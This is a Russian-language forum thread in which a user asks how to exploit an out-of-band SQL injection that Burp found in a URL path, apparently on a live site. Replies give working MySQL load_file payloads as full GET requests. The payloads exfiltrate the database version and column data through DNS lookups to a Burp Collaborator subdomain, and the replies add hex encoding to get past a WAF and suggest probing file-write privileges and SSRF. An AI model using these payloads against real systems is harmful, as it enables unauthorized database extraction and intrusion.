![]() |
Первый раз столкнулся с такой уязвимостью
Бурп Говорит sql Код:
The URL path filename appears to be vulnerable to SQL injection attacks. The payload (select load_file('\\\\x9cx3zrqjd911f1f2ppyfpliy.burpcollaborator.net\\wer')) was submitted in the URL path filename. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The database appears to be MySQL.Код:
The Collaborator server received a DNS lookup of type A for the domain name x9cx3zrqjd911f1f2ppyfpliy.burpcollaborator.netПодскажите как крутануть |
Выполнился подзапрос и произошла попытка отрезольвить поддомен burpcollaborator.net.
Это говорит о том что доступны функциии работы с файлами, load_file() - точно доступна. Т.е. - чтение файлов, возможно - запись файлов. Это - SQLi с файловыми привилегиями, соответственно все способы работы с SQLi и пробовать. И можно проверить на SSRF. |
Цитата:
Цитата:
Цитата:
Код:
(select load_file(concat('\\\\',version(),'.burpcollaborator.net\\')))Стоит отмтетить, что техники типа Time-Based, Boolean-Based, OOB, стоит использовать в последнюю очередь, в связи с их накладными расходами и лишней "шумностью". И как правильно подметил @dooble, нужно проверить права на запись файлов, что будет гораздо проще, а, возможно даже, это есть основная цель атаки |
Цитата:
Возможно это обычная SQLi, возможно даже с выводом. Поэтому можно пробовать все, что умеем с SQLi. |
Цитата:
[CRITICAL] unable to connect to the target URL Мне нужно сделать проброс портов(53) я так понимаю? |
Цитата:
|
Цитата:
|
Цитата:
Пока, можно посоветовать только это: https://bit.ly/3ryAB53 https://bit.ly/3lBaeYj Во избежание гадания на кофейной гуще, требуется: - Полный запрос (HTTP) который блокируется - С какимим параметрами запускается SQLMap И тогда, возможно, кто-то поможет обойти/раскрутить инъекцию. |
Цитата:
Получаем поддомен (по кнопке "Copy to clipboard"), например выдали такой адрес: etb1a29yallq56jzonu0fx3cz35tti.burpcollaborator.ne t тогда шлем запросы Код:
GET /(select%20load_file(concat('\\\\',version(),'.etb1a29yallq56jzonu0fx3cz35tti.burpcollaborator.net\\')))/ HTTP/1.1Код:
10.3.31-MariaDB-0ubuntu0.20.04.1.etb1a29yallq56jzonu0fx3cz35tti.burpcollaborator.netКод:
GET /(select%20load_file(concat('\\\\','random_string.',(select%20version()),'.etb1a29yallq56jzonu0fx3cz35tti.burpcollaborator.net\\')))/ HTTP/1.1Код:
GET /(select%20load_file(concat('\\\\','random_string.',(select%20column_name%20from%20table_name),'.etb1a29yallq56jzonu0fx3cz35tti.burpcollaborator.net\\')))/ HTTP/1.1Если в результате подзапроса будут недопустимые символы для ДНС, можно их захексить (hex()). Вот тогда и будет видно, на чего агрится ваф. |
| Время: 16:10 |